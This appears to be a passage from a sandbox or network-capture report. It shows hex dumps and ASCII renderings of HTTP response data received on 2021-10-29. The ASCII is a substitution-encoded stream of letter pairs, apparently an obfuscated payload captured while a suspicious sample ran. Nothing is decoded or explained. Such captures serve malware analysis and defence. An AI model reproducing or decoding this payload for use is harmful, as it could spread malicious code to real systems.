                                                            2021-10-29 18:10:39 UTC1030INData Raw: 20 6d 45 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 57 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 4d 58 20 4f 20 57 57 20 4f 20 57 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 58 57 20 4f 20 71 4a 4a 20 4f 20 45 6d 20 4f 20 57 71 20 4f 20 6d 45 20 4f 20 6d 58 20 4f 20 45 45 20 4f 20 4d 45 20 4f 20 58 6d 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 57 57 20 4f 20 45 4f 20 4f 20 71 4f 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 45 4d 20 4f 20 71 4a 4f 20 4f 20 4d 4f 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 4a 4a 20 4f 20 71 71 57 20 4f 20 58 45 20 4f 20 58 6d 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 57 57 20 4f 20 45 4f 20 4f 20 71 4f 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 45 4d 20 4f 20 71 4a 4f 20 4f 20 4d 4f 20 4f 20 58
                                                            Data Ascii: mE O qqX O mE O mp O mE O mE O WW O mE O mE O MX O WW O WD O mE O mE O XW O qJJ O Em O Wq O mE O mX O EE O ME O Xm O mE O WD O WW O EO O qOE O mE O mE O EM O qJO O MO O XO O mE O qJJ O qqW O XE O Xm O mE O WD O WW O EO O qOE O mE O mE O EM O qJO O MO O X
                                                            2021-10-29 18:10:39 UTC1031INData Raw: 4f 70 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 4a 4a 20 4f 20 4d 58 20 4f 20 57 4a 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 71 57 20 4f 20 57 4f 20 4f 20 6d 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 57 57 20 4f 20 45 58 20 4f 20 71 71 58 20 4f 20 71 4f 4a 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 4a 4a 20 4f 20 4d 58 20 4f 20 57 4a 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 71 57 20 4f 20 57 4f 20 4f 20 6d 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 57 57 20 4f 20 45 58 20 4f 20 71 71 58 20 4f 20 71 4f 70 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 4a 4a 20 4f 20 4d 58 20 4f 20 57 71 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 57 4f 20 4f 20 71 71 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 57 20 4f 20 45 58 20 4f 20 71 71 6d 20 4f 20 71 4f 4a
                                                            Data Ascii: Op O mE O mp O qJJ O MX O WJ O XO O mE O qqW O WO O mp O DX O mE O WW O EX O qqX O qOJ O mE O mp O qJJ O MX O WJ O XO O mE O qqW O WO O mp O DX O mE O WW O EX O qqX O qOp O mE O mp O qJJ O MX O Wq O mE O mE O qqm O WO O qqD O mE O mE O WW O EX O qqm O qOJ
                                                            2021-10-29 18:10:39 UTC1032INData Raw: 4f 20 4f 20 71 4f 44 20 4f 20 71 4f 58 20 4f 20 45 71 20 4f 20 71 71 71 20 4f 20 45 44 20 4f 20 57 4a 20 4f 20 57 4f 20 4f 20 71 4a 71 20 4f 20 58 45 20 4f 20 44 4d 20 4f 20 6d 70 20 4f 20 71 4f 4f 20 4f 20 4d 4d 20 4f 20 58 71 20 4f 20 71 4f 4f 20 4f 20 71 4f 71 20 4f 20 45 70 20 4f 20 45 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 71 4f 70 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 71 57 20 4f 20 58 71 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 6d 20 4f 20 44 4d 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 57 20 4f 20 71 4a 4f 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 71 71 57 20 4f 20 58 71 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 71 6d 20 4f 20 44 4d
                                                            Data Ascii: O O qOD O qOX O Eq O qqq O ED O WJ O WO O qJq O XE O DM O mp O qOO O MM O Xq O qOO O qOq O Ep O EJ O DW O DW O Xq O qOp O qOp O DW O Eq O qqW O Xq O MM O DW O DD O qqm O DM O DM O DW O DW O EW O qJO O DD O DW O DW O DE O qqW O Xq O Xq O DW O DW O qqm O DM
                                                            2021-10-29 18:10:39 UTC1034INData Raw: 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 57 20 4f 20 45 70 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 6d 20 4f 20 57 71 20 4f 20 71 4f 4f 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 6d 20 4f 20 57 71 20 4f 20 71 4f 4f 20 4f 20 57 71 20 4f 20 71 4f 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 6d 20 4f 20 57 71 20 4f 20 71 4f 4f 20 4f 20 57
                                                            Data Ascii: DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O qOW O Ep O qOp O DW O DW O DW O DW O DW O DW O DW O qOm O Wq O qOO O WJ O DW O DW O DW O DW O DW O DW O qOm O Wq O qOO O Wq O qOq O DW O DW O DW O DW O DW O qOm O Wq O qOO O W
                                                            2021-10-29 18:10:39 UTC1035INData Raw: 4f 20 58 4d 20 4f 20 44 57 20 4f 20 58 57 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 4f 6d 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 58 4d 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 6d 58 20 4f
                                                            Data Ascii: O XM O DW O XW O qqM O DD O qOm O DW O EJ O XM O DW O MO O Xq O DW O qOp O DW O EO O EE O DW O MO O Xq O DD O qqW O DW O Eq O XW O DW O XM O qqM O DD O mX O DW O Eq O XW O DW O MO O DW O DW O qOp O DW O DM O qOE O DW O qOO O DW O DD O qOX O DW O Eq O mX O
                                                            2021-10-29 18:10:39 UTC1036INData Raw: 20 44 57 20 4f 20 4d 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 45 6d 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4a 71 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 45 57 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 44 58 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20
                                                            Data Ascii: DW O MO O DW O DW O qOp O DW O DM O qOE O DW O qOO O DW O DD O qOX O DW O Eq O mX O DW O MM O qqM O DW O Em O DW O DM O EE O DW O qOO O DW O DD O qJq O DW O Eq O qqM O DW O EW O qqM O DD O DX O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O
                                                            2021-10-29 18:10:39 UTC1038INData Raw: 4f 20 71 4f 4f 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 4a 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 58 20 4f 20 45 6d 20 4f 20 71 4a 4f 20 4f 20 45 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 71 71 6d 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 6d 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 58 4f 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 71 58 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f
                                                            Data Ascii: O qOO O DW O DD O qqJ O DW O EJ O DW O DW O MM O qqM O DW O DW O DW O DW O DW O DW O XX O Em O qJO O EX O DW O Eq O DM O DW O MM O qOp O DD O qqm O DW O DE O DW O DW O Em O qOp O DD O XO O DW O Eq O Xq O DW O MO O DW O DW O qqX O DW O DM O XW O DW O qOO O
                                                            2021-10-29 18:10:39 UTC1039INData Raw: 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 6d 20 4f 20 45 6d 20 4f 20 71 71 4d 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 58
                                                            Data Ascii: DW O qOp O DW O DM O EE O DW O MX O qqM O DD O qqW O DW O EJ O XW O DW O MX O Xq O DW O qOM O DW O Eq O WJ O DW O MM O qqM O DW O DW O DW O DW O DW O DW O Xm O Em O qqM O qOM O DW O DM O DM O DW O qOO O Xq O DD O mX O DW O Eq O WD O DW O Ep O DW O DD O X
                                                            2021-10-29 18:10:39 UTC1040INData Raw: 4d 4f 20 4f 20 71 71 4d 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 58 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 57 70 20 4f 20 71 71 4d
                                                            Data Ascii: MO O qqM O qOM O DW O DM O WD O DW O MM O DW O DD O mX O DW O Eq O qOE O DW O MX O qqM O DD O qqE O DW O EJ O EE O DW O DW O DW O DE O Xq O DW O DE O XM O DW O Xp O DW O DD O qOX O DW O Eq O qqM O DW O MM O DW O DW O DW O DW O Ep O DW O DW O Xq O Wp O qqM
                                                            2021-10-29 18:10:39 UTC1042INData Raw: 4f 20 44 44 20 4f 20 45 71 20 4f 20 71 71 4f 20 4f 20 44 4d 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 58 44 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 45 58 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 58 70 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71
                                                            Data Ascii: O DD O Eq O qqO O DM O qOp O DW O XD O DW O DD O EX O DW O DM O qqM O DW O Ep O DW O DD O Xp O DW O Eq O XW O DW O MM O DW O DD O qqX O DW O EJ O Ep O DW O qOO O DW O DW O qOp O DW O DE O mX O DW O Ep O DW O DD O DD O DW O Eq O qqM O DW O MX O DW O DW O q
                                                            2021-10-29 18:10:39 UTC1043INData Raw: 20 6d 58 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 71 6d 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 6d 4d 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 4f 4d 20 4f 20 4d 4d 20 4f 20 45 6d 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f
                                                            Data Ascii: mX O DW O EJ O Ep O DW O MX O DW O DW O qqm O DW O EO O DW O DW O MX O DW O DD O mM O DW O EJ O EE O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DM O qOM O MM O Em O qOp O DD O Xq O DW O EJ O Ep O DW O MX O qqM O DD O qqM O DW O
                                                            2021-10-29 18:10:39 UTC1044INData Raw: 20 6d 45 20 4f 20 6d 45 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 58 4f 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 57 20 4f 20 44 57 20 4f 20 45 4d 20 4f 20 71 4f 45 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20
                                                            Data Ascii: mE O mE O qOp O DW O DD O XO O DW O DM O qqW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DE O Xq O DW O DW O DW O DW O DW O DW O EJ O DW O DW O qOp O DW O XO O DW O DW O EW O DW O EM O qOE O DX O mE O mE O mp O DE O DW O DW O DW O DW O
                                                            2021-10-29 18:10:39 UTC1046INData Raw: 20 4f 20 57 70 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 4a 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 4a 20 4f 20 44 57 20 4f
                                                            Data Ascii: O Wp O DW O DE O DW O DW O XJ O Xq O DD O WJ O DW O Eq O EE O DW O MO O Xq O DD O qqM O DW O EJ O Xq O DW O ME O Xq O DD O qqX O DW O Eq O WJ O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DD O XW O DW O DW O DW O DW O DW O DD O qOJ O DW O
                                                            2021-10-29 18:10:39 UTC1047INData Raw: 45 45 20 4f 20 44 57 20 4f 20 58 4d 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 4a 71 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 4a 71 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 6d 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 45 45 20 4f 20 44 57
                                                            Data Ascii: EE O DW O XM O Xq O DD O mX O DW O Eq O qOE O DW O MX O qqM O DD O qqE O DW O DE O DW O DW O MO O Xq O DD O qJq O DW O EJ O Ep O DW O MX O qqM O DD O qJq O DW O DE O DW O DW O ME O DW O DD O qOm O DW O EJ O EE O DW O Ep O DW O DD O qqX O DW O Eq O EE O DW
                                                            2021-10-29 18:10:39 UTC1048INData Raw: 57 44 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 4d 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 57 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 58 4d 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 4a 71 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 71 20 4f 20
                                                            Data Ascii: WD O DW O MX O qOp O DW O qOp O DW O EJ O Xq O DW O MX O qqM O DW O qOp O DW O EJ O Xq O DW O ME O DW O DD O qOX O DW O DE O DW O DW O XM O qqM O DD O qqW O DW O Eq O qOE O DW O MM O DW O DD O qOW O DW O Eq O WD O DW O XM O Xq O DD O qJq O DW O Eq O Xq O
                                                            2021-10-29 18:10:39 UTC1050INData Raw: 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 58 6d 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 71 20 4f 20 44
                                                            Data Ascii: p O DW O DD O Xm O DW O Eq O qOp O DW O MO O Xq O DD O qqW O DW O Eq O qqM O DW O Ep O DW O DD O DM O DW O Eq O qqM O DW O MO O qqM O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DE O XW O DW O MM O DW O DE O Xq O D
                                                            2021-10-29 18:10:39 UTC1051INData Raw: 44 57 20 4f 20 44 4d 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 6d 4d 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 57 6d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20
                                                            Data Ascii: DW O DM O qqM O DW O ME O Xq O DD O qqE O DW O Eq O XW O DW O Ep O DW O DD O DD O DW O EJ O Ep O DW O MO O qqM O DD O mM O DW O Eq O mX O DW O MO O Xq O DD O qqE O DW O EJ O Xq O DW O MM O qqM O DW O Wm O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O
                                                            2021-10-29 18:10:39 UTC1052INData Raw: 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 58 4a 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 4d 58 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 71 71 20 4f 20 44 57 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 4f 70 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 58 71 20 4f
                                                            Data Ascii: O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DE O XW O DW O MM O DW O XJ O Xq O DD O MX O DW O DW O qqq O DW O WD O DW O EE O DW O DW O XO O mE O mE O qOp O qOp O DD O Xq O DW O EJ O Ep O DW O ME O Xq O
                                                            2021-10-29 18:10:39 UTC1054INData Raw: 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 44 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 58 45 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 45 6d 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 4d 4d 20 4f 20 44 58 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 44 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 4a 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 4d 4d 20 4f 20
                                                            Data Ascii: DW O DW O DW O DW O DW O DW O DW O DW O DW O EE O DW O DW O XD O DW O EJ O DW O EO O qOE O DW O XE O qqM O DW O Em O DW O XO O MM O DX O DW O DW O DX O mE O mE O WJ O DW O DW O XD O qqM O DD O qqJ O DW O Eq O WJ O DW O MO O DW O DD O qqX O DW O EJ O MM O
